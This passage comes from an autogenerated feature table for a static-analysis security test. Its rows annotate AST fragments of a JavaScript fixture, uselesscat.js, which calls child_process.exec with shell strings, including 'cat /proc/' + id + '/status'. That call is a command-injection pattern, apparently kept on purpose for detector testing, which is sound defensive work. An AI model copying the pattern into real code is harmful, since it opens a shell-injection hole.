contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:4:5:4:29 | exec = ... ss.exec | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:4:12:4:24 | child_process | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:4:12:4:24 | child_process | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:4:12:4:24 | child_process | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:4:12:4:29 | child_process.exec | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:4:12:4:29 | child_process.exec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:4:12:4:29 | child_process.exec | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:4:26:4:29 | exec | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:4:26:4:29 | exec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:4:26:4:29 | exec | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:5:5:5:9 | spawn | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:5:5:5:9 | spawn | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:5:5:5:9 | spawn | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:5:5:5:9 | spawn | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:5:5:5:31 | spawn | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:5:5:5:31 | spawn | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:5:5:5:31 | spawn | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:5:5:5:31 | spawn = ... s.spawn | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:5:5:5:31 | spawn = ... s.spawn | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:5:5:5:31 | spawn = ... s.spawn | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:5:13:5:25 | child_process | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:5:13:5:25 | child_process | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:5:13:5:25 | child_process | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:5:13:5:31 | child_process.spawn | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:5:13:5:31 | child_process.spawn | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:5:13:5:31 | child_process.spawn | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:5:27:5:31 | spawn | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:5:27:5:31 | spawn | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:5:27:5:31 | spawn | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:6:5:6:13 | spawnSync | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:6:5:6:13 | spawnSync | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:6:5:6:13 | spawnSync | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:6:5:6:39 | spawnSy ... awnSync | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:6:5:6:39 | spawnSy ... awnSync | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:6:5:6:39 | spawnSy ... awnSync | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:6:17:6:29 | child_process | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:6:17:6:29 | child_process | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:6:17:6:29 | child_process | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:6:17:6:39 | child_p ... awnSync | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:6:17:6:39 | child_p ... awnSync | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:6:17:6:39 | child_p ... awnSync | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:6:31:6:39 | spawnSync | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:6:31:6:39 | spawnSync | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:6:31:6:39 | spawnSync | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:7:5:7:6 | fs | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:7:5:7:6 | fs | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:7:5:7:6 | fs | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:7:5:7:22 | fs = require('fs') | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:7:5:7:22 | fs = require('fs') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:7:5:7:22 | fs = require('fs') | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:7:10:7:16 | require | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:7:10:7:16 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:7:10:7:16 | require | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:7:10:7:22 | exceptional return of require('fs') | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:7:10:7:22 | exceptional return of require('fs') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:7:10:7:22 | exceptional return of require('fs') | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:7:10:7:22 | require('fs') | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:7:10:7:22 | require('fs') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:7:10:7:22 | require('fs') | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:7:18:7:21 | 'fs' | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:7:18:7:21 | 'fs' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:7:18:7:21 | 'fs' | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:7:18:7:21 | 'fs' | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:7:18:7:21 | 'fs' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:7:18:7:21 | 'fs' | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:8:5:8:7 | app | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:8:5:8:7 | app | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:8:5:8:7 | app | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:8:5:8:19 | app = express() | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:8:5:8:19 | app = express() | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:8:5:8:19 | app = express() | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:8:11:8:17 | express | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:8:11:8:17 | express | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:8:11:8:17 | express | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:8:11:8:19 | exceptional return of express() | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:8:11:8:19 | exceptional return of express() | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:8:11:8:19 | exceptional return of express() | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:8:11:8:19 | express() | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:8:11:8:19 | express() | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:8:11:8:19 | express() | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:10:1:10:4 | exec | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:10:1:10:4 | exec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:10:1:10:4 | exec | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:10:1:10:43 | exceptional return of exec("c ... ut) {}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:10:1:10:43 | exceptional return of exec("c ... ut) {}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:10:1:10:43 | exceptional return of exec("c ... ut) {}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:10:1:10:43 | exec("c ... ut) {}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:10:1:10:43 | exec("c ... ut) {}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:10:1:10:43 | exec("c ... ut) {}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:10:6:10:18 | "cat foo/bar" | CalleeFlexibleAccessPath | exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:10:6:10:18 | "cat foo/bar" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:10:6:10:18 | "cat foo/bar" | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:10:6:10:18 | "cat foo/bar" | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:10:6:10:18 | "cat foo/bar" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:10:6:10:18 | "cat foo/bar" | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:10:21:10:20 | this | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:10:21:10:20 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:10:21:10:20 | this | enclosingFunctionBody | err out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:10:21:10:20 | this | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:10:21:10:20 | this | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:10:21:10:42 | 'arguments' object of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:10:21:10:42 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:10:21:10:42 | 'arguments' object of anonymous function | enclosingFunctionBody | err out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:10:21:10:42 | 'arguments' object of anonymous function | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:10:21:10:42 | 'arguments' object of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:10:21:10:42 | exceptional return of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:10:21:10:42 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:10:21:10:42 | exceptional return of anonymous function | enclosingFunctionBody | err out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:10:21:10:42 | exceptional return of anonymous function | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:10:21:10:42 | exceptional return of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:10:21:10:42 | functio ... out) {} | CalleeFlexibleAccessPath | exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:10:21:10:42 | functio ... out) {} | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:10:21:10:42 | functio ... out) {} | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:10:21:10:42 | functio ... out) {} | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:10:21:10:42 | functio ... out) {} | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:10:21:10:42 | functio ... out) {} | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:10:21:10:42 | return of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:10:21:10:42 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:10:21:10:42 | return of anonymous function | enclosingFunctionBody | err out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:10:21:10:42 | return of anonymous function | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:10:21:10:42 | return of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:10:31:10:33 | err | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:10:31:10:33 | err | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:10:31:10:33 | err | enclosingFunctionBody | err out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:10:31:10:33 | err | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:10:31:10:33 | err | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:10:36:10:38 | out | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:10:36:10:38 | out | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:10:36:10:38 | out | enclosingFunctionBody | err out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:10:36:10:38 | out | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:10:36:10:38 | out | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:1:12:4 | exec | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:1:12:4 | exec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:1:12:4 | exec | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:1:14:2 | exceptional return of exec("c ... ut);\\n}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:1:14:2 | exceptional return of exec("c ... ut);\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:1:14:2 | exceptional return of exec("c ... ut);\\n}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:1:14:2 | exec("c ... ut);\\n}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:1:14:2 | exec("c ... ut);\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:1:14:2 | exec("c ... ut);\\n}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:6:12:17 | "cat /proc/" | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:6:12:17 | "cat /proc/" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:6:12:17 | "cat /proc/" | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:6:12:17 | "cat /proc/" | stringConcatenatedWith | -endpoint- id + '/status' | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:6:12:22 | "cat /proc/" + id | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:6:12:22 | "cat /proc/" + id | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:6:12:22 | "cat /proc/" + id | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:6:12:34 | "cat /p ... status" | CalleeFlexibleAccessPath | exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:6:12:34 | "cat /p ... status" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:6:12:34 | "cat /p ... status" | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:6:12:34 | "cat /p ... status" | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:6:12:34 | "cat /p ... status" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:6:12:34 | "cat /p ... status" | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:21:12:22 | id | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:21:12:22 | id | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:21:12:22 | id | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:21:12:22 | id | stringConcatenatedWith | 'cat /proc/' -endpoint- '/status' | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:26:12:34 | "/status" | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:26:12:34 | "/status" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:26:12:34 | "/status" | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:26:12:34 | "/status" | stringConcatenatedWith | 'cat /proc/' + id -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:37:12:36 | this | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:37:12:36 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:37:12:36 | this | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:37:12:36 | this | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:37:12:36 | this | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:37:14:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:37:14:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:37:14:1 | 'arguments' object of anonymous function | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:37:14:1 | 'arguments' object of anonymous function | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:37:14:1 | 'arguments' object of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:37:14:1 | exceptional return of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:37:14:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:37:14:1 | exceptional return of anonymous function | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:37:14:1 | exceptional return of anonymous function | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:37:14:1 | exceptional return of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:37:14:1 | functio ... out);\\n} | CalleeFlexibleAccessPath | exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:37:14:1 | functio ... out);\\n} | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:37:14:1 | functio ... out);\\n} | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:37:14:1 | functio ... out);\\n} | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:37:14:1 | functio ... out);\\n} | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:37:14:1 | functio ... out);\\n} | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:37:14:1 | return of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:37:14:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:37:14:1 | return of anonymous function | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:37:14:1 | return of anonymous function | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:37:14:1 | return of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:47:12:49 | err | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:12:47:12:49 